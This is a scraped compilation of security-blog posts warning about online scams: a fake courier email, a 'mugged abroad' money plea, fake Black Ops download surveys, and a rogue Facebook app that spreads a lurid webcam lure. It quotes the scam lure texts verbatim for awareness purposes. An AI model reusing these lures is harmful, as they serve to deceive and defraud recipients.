
http://www.awardmails.biz/pages/index.php?refid=sangjongpay

18. “Post Express. Delivery refuse! NR12976″

Dear Customer

Your package has been returned to the Post Express office.
The reason of the return is “Error in the delivery address”

Attached to the letter mailing label contains the details of the package delivery.
You have to print mailing label, and come in the Post Express office in order to receive the packages.

Thank you for your attention.
Post Express Service.

This wandered into a spamtrap last night, and you should consider firing it into the heart of the Sun:

“Am sorry for not informing you about my propose trip to UK and presently I’m writing this with tears in my eyes,my family and I came down here to Cardiff,United Kingdom for a short vacation unfortunately we were mugged at the park of the hotel where we stayed,all cash,credit card and cell were stolen off us but luckily for us we still have our passports with us.

We’ve been to the embassy and the Police here but they’re not helping issues at all and our flight leaves in less than 3hrs from now but we’re having problems settling the hotel bills and the hotel manager won’t let us leave until we settle the bills.

Am freaked out at the moment,

Judy.”

Thanks, random person I’ve never met before!

Cardiff: where muggings prompt unsolicited emails and hotel managers chain you to your room until bills are settled. Or not (it’s actually a nice place, they film Doctor Who there and everything).

Christopher Boyd

Bits and pieces of popular culture will always be a target for scams, and we’ve already seen more than our fair share of Black Ops shenaningans; fake keygens / cracks back in November, and a curious tale from January of how gamers broke into a radiology server to play some rounds while apparently failing to touch the mass of personal info sitting on the compromised box.

February is almost upon us, and that means a new target enters the crosshairs – the Black Ops map pack downloadable content is available for all ($ 15 / £10 to you, guv’nor with a nifty Youtube preview to make you wave your wallet) and this means scammers are out in force.

Click to Enlarge

Click to Enlarge

Click to Enlarge

Click to Enlarge

As with almost every scam these days, they just want to pop a survey and make some affiliate cash. At best, a dummy file is hiding behind the survey; at worst, you’ll end up with a nasty infection stomping up and down on your hard drive.

Click to Enlarge

Survey popping scams seem to be as popular as ever, which probably means a good chunk of people are still filling the things in then wondering why “dubiouswormthing.exe” causes their hard drive to melt.

Don’t be one of those melty hard drive people.

Christopher Boyd

How low is a Facebook scammer prepared to go? Here’s a pretty sick rogue application that we’ve seen affecting some users of the world’s most popular social network, leading to the all too familiar money-making survey scam at the end.

OMG she is so busted!! Dad catches Daughter on Webcam! [LINK]

Hmm. It would be nice to think that no-one would be interested in clicking on a link like that. But human nature being what it is, some folks (guys in particular I would guess) might be tempted to find out more and find they aren’t able to show some restraint.

So, what does happen if you click on the link?

First thing you’ll see is this splash screen (I’ve used some pixelation to protect the innocent):

If you are still tempted to click further, you’ll be asked by a rogue Facebook application to grant permission for it to be able to post to your wall.

By the way, it’s not just your personal Facebook page that the app will be able to post updates to – it will also be able to publish to any pages you might be responsible for, which could prove highly damage if you administer a Facebook page for your firm.

So, after all this, do you get to see the video?

Nope. Instead, you’ll be greeted by a survey. And this survey makes money for the scammers behind the scheme as they earn commission for every survey completed.

Worse still, your Facebook account has already been abused by the rogue application which has posted a message about the dad catching his daughter stripping on a webcam for all of your Facebook friends to see.

Wow she got caught so dirty.

Busted!! Dad Catches Daughter on Webcam!
Do not watch unless 18+
Content is graphic. Watch at your own risk!

In this way the scam spreads virally, attempting to earn as much money as possible for the survey scammers.

I know there will be people out there who feel that anyone who clicks on links like this deserve everything they get, but that doesn’t mean the rest of us should be bombarded by spammy messages on Facebook just because some of our online friends have turned out to be a littel bit seedy.

We’ve seen cybercriminals use grubby themes like this to spread their attacks, and no doubt we’ll see them again. Human nature isn’t going to change and people will carry on clicking on them unless they’re educated about the threats. Of course, it wouldn’t do any harm if Facebook could work a little harder at preventing scams like this occurring in the first place.

If you have been hit by scams like this on Facebook, and are struggling to clean-up your profile, here’s a YouTube video I made which describes what steps you need to take:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Make sure that you keep informed about the latest scams spreading fast across Facebook and other internet attacks. Join the Sophos page on Facebook, where over 60,000 people regularly share information on threats and discuss the latest security news.

Full story: Naked Security – Sophos